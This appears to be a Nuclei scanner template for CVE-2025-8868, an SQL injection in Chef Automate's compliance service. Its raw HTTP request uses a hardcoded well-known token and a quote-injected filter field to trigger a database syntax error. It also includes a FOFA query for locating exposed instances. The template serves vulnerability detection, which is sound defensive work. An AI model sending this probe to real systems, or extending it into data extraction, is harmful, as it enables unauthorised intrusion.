In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
PoC代码[已公开]
id: CVE-2025-8868
info:
name: Chef Automate < 4.13.295 — SQL Injection
author: 3th1c_yuk1,xbow
severity: critical
description: |
In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
remediation: |
Upgrade to version 4.13.295 or later.
reference:
- https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate
- https://nvd.nist.gov/vuln/detail/CVE-2025-8868
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-8868
epss-score: 0.10513
epss-percentile: 0.92936
cwe-id: CWE-89
metadata:
verified: true
max-request: 1
fofa-query: body="Chef Automate"
tags: cve,cve2025,chef,automate,sqli,vkev,vuln
http:
- raw:
- |
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
{"filters": [{"type": "name'", "values": ["test"]}]}
matchers:
- type: dsl
dsl:
- "status_code == 500"
- "contains(body, 'pq: syntax error')"
- "contains(content_type, 'application/json')"
condition: and
# digest: 490a004630440220698958648d0a4899f549d28eea2026120e8231a4d7e713e92b8f0b57fbf22acb0220449a6e1c7841465842757eeeaa9f03142763a4124f491d48b5e44f41d78eda96:922c64590222798bb761d5b6d8e72950